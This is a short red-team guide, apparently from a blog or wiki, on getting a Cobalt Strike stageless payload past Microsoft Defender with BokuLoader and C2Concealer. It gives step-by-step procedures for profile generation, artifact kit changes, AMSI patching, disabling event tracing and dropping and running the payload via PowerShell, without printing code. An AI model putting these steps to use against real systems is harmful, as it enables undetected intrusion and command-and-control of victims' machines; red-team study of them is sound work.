Evading Defender with CobaltStrike
quick guide to evading Defender (as of 26 May 202)
The following guide is based off of BokuLoader and C2Concealer. BokuLoader utilizes Halo's Gate to perform direct syscalls, patches AmsiOpenSession to disable AMSI, and disables windows event tracing. For a more in depth guide on how Reflective DLLs work or how AMSI is disabled within this process I recommend Sektor7s Malware Development and Windows Evasion courses or OffSec's PEN-300 course.
To start clone both github projects mentioned earlier
You'll want to run C2concealer's install script and update the main.py script with the location of your CobaltStrike folder. With that information updated and C2Concealer installed, its time to generate your own profile. Keep in mind you should follow FortyNorthSecurity's guide for customizing the tool to your Op.
If the profile fails to generate, run the script a couple more times.
Next start up your teamserver.
Now it's time to update the artifact kit to set the stagesize to 412256. Update this in build.sh and dist-template/artifact.cna
Now its time to load the dist-template/artifact.cna and BokuLoader.cna aggressor scripts in CobaltStrike.
Now generate your x64 stageless payload (Attacks -> Packages -> Windows Executable (S)). A successful payload generation should look something like this in your script console:
Now it's time to deliver the payload to the target, in this example we used hosted file to drop the payload on disk and run the exe. (Attacks -> Web Drive-by -> Host File)
If you're just testing this, make sure to disable Tamper Protection, Automatic Sample Submission, and Cloud Delivered Protection.
download and execute the payload in whatever manner you want, we choose to use powershell.
Last updated
